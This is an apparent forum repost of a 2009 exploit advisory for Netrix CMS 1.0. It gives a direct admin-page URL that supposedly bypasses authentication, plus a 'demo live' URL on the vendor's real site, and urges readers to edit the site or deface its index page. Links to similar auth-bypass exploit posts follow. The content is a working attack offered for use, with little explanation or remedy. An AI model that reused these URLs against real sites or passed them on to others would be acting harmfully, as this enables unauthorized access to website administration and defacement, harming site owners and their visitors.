- Code:
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] script :Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability
[+] Found by : Mr.tro0oqy
[+] script site : www.netrix.hu
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit :
---------
http://www.site.com/path/admin/cikkform.php?cid=1
---------
u in control panel
control panel :
-------------
http://www.site.com/path/admin
-------------
Demo live :
-----------
http://cms.netrix.hu/admin/cikkform.php?cid=1
-----------
u can edit anything or put on your index ;)
# milw0rm.com [2009-07-20]
Netrix CMS 1.0 Authentication Bypass Vulnerability
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» AJOX Poll (managepoll.php) Authentication Bypass Vulnerability
» AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
» SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability
» powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
» webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit
» AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
» SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability
» powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
» webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit